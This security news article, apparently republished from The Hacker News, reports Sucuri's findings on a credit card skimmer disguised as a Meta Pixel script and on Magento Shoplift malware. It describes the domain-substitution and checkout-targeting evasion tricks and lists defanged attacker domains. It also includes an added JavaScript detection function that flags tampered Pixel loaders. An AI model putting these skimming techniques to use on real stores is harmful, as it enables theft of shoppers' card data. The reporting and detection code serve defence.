
Credit card hacker presented as innocent Facebook tracking tool

Cybersecurity researchers have uncovered a credit card skimmer embedded in a fake Meta Pixel tracking script in an attempt to evade detection.


Sucuri reports that the malware is injected into websites through tools that allow custom code to be inserted. These include WordPress plugins such as Simple Custom CSS and JS, as well as the "Miscellaneous Scripts" section of the Magento admin panel.


The web security company's analysis uncovered a fake Meta Pixel tracking script that contains elements similar to those of the official one. Closer inspection, however, reveals a significant difference: added JavaScript code that replaces references to "connect.facebook[.]net" with "b-connected[.]com".

While the first domain is the genuine one used by the Pixel tracking function, the replacement domain is used to load a malicious script ("fbevents.js"). This script checks whether the victim is on a purchase completion (checkout) page and, if so, displays a deceptive overlay designed to steal their credit card details.

It is worth noting that "b-connected[.]com" is a legitimate e-commerce site that was hacked in the past so that attackers could plant malicious code on it. In addition, the data submitted through the fake overlay is passed on to another compromised website, "www.donjuguetes[.]es".

To reduce the risk, keep your websites up to date, regularly review your administrator accounts to confirm that each one is valid, and change your passwords regularly.

Strengthening security is crucial, as hackers often exploit weak passwords and WordPress vulnerabilities to infiltrate targeted websites. Their aim is to create fake administrator accounts, which can then be used for further harmful actions such as installing malicious backdoors.


"Credit card hackers typically search for specific keywords like 'checkout' or 'onepage', which means that hacker attacks may not be detected until the checkout page is fully loaded," Morrow said.

Because purchase completion pages are generated using cookies and other elements, these scripts escape detection by scanners. The only way to detect the malware is to check the page's source code or to monitor network traffic. These scripts execute discreetly and remain unnoticed in the browsing history.
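One way to check page source or a custom-script field for the domain substitution described above, as an added example that is not code from Sucuri or the original article. The function name `auditPixelSource`, the rule names and the placeholder host `cdn.example.test` are assumptions made for illustration.

```javascript
// Added example: static audit of page source or a custom-script field for a
// tampered Meta Pixel loader. All sample inputs are constructed.
const OFFICIAL_HOST = "connect.facebook.net";

// First argument of a .replace()/.replaceAll() call (string or regex literal).
const REPLACE_ARG = /\.replace(?:All)?\s*\(\s*(["'`\/])([^"'`\/]*)\1/g;
// Any URL that ends in the Pixel library's file name.
const PIXEL_URL = /(?:https?:)?\/\/([a-z0-9.-]+)\/[^\s"'`)]*fbevents\.js/gi;

function auditPixelSource(source) {
  const findings = [];
  // Only audit text that presents itself as a Meta Pixel snippet.
  if (!/fbevents\.js|\bfbq\s*\(/.test(source)) return findings;

  // Rule 1: code that rewrites the official host at run time.
  for (const m of source.matchAll(REPLACE_ARG)) {
    const arg = m[2].replace(/\\/g, "").toLowerCase(); // drop regex escapes
    if (arg.includes(OFFICIAL_HOST)) {
      findings.push({ rule: "host-rewrite", evidence: m[0] });
    }
  }
  // Rule 2: fbevents.js requested from a host other than the official one.
  for (const m of source.matchAll(PIXEL_URL)) {
    if (m[1].toLowerCase() !== OFFICIAL_HOST) {
      findings.push({ rule: "unofficial-host", evidence: m[0] });
    }
  }
  return findings;
}

// Constructed samples; cdn.example.test is a placeholder host.
const SAMPLES = {
  clean: `s.src = "https://connect.facebook.net/en_US/fbevents.js"; fbq("init", "000");`,
  tampered: `var u = "https://connect.facebook.net/en_US/fbevents.js"
    .replace("connect.facebook.net", "cdn.example.test"); s.src = u; fbq("init", "000");`,
  direct: `s.src = "//cdn.example.test/en_US/fbevents.js"; fbq("init", "000");`,
};

for (const [name, src] of Object.entries(SAMPLES)) {
  console.log(name, auditPixelSource(src));
}
```

A static check like this only catches substitutions written in plain text; loaders that hide the domain still require watching the checkout page's network traffic.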

Sucuri also reveals that websites created with WordPress and Magento are being targeted by a new malware, Magento Shoplift. Variants of Magento Shoplift were spotted spreading as of September 2023, increasing the need for security.

The attack begins by embedding an undefined piece of JavaScript code into a legitimate JavaScript file. This initial step triggers the loading of a second script from jqueurystatics[.]com over a secure WebSocket (WSS) connection. The second script is designed to harvest credit card data and steal information while posing as a Google Analytics script.

"WordPress has become a colossus in the e-commerce sector, thanks to the inclusion of WooCommerce and other extensions that conveniently transform a WordPress site into a fully functional online store," said researcher Puja Srivastava.


The popularity of WordPress makes its sites a prime target for attacks, with hackers adapting the MageCart e-commerce malware to target a wider range of content management systems (CMS).

Source: thehackernews

SecNews